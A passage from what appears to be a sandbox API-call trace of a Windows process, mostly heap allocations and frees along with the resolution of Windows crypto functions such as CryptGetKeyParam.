Flags=0x0, Size=0x8) returned 0x43e2570 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0078.991] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0078.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0078.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18b87) returned 0x48f0048 [0078.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18b87) returned 0x4921768 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.992] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.992] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0078.993] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0078.993] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0078.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0078.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0078.994] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0078.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0078.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2840 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0078.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0078.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0078.994] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0078.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0078.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0078.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0078.995] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0078.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0078.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0078.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0078.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0078.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0078.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0078.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0078.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0078.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.996] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0078.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0078.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0078.996] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0078.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad18 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0078.997] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0078.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0078.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0078.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0078.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0078.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0078.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0078.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0078.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0078.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0078.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0078.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0078.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0078.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0078.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0078.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0078.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0078.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0078.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0078.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0078.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0078.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0078.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0078.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0078.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0078.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0078.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0078.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0078.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0078.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0079.001] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) 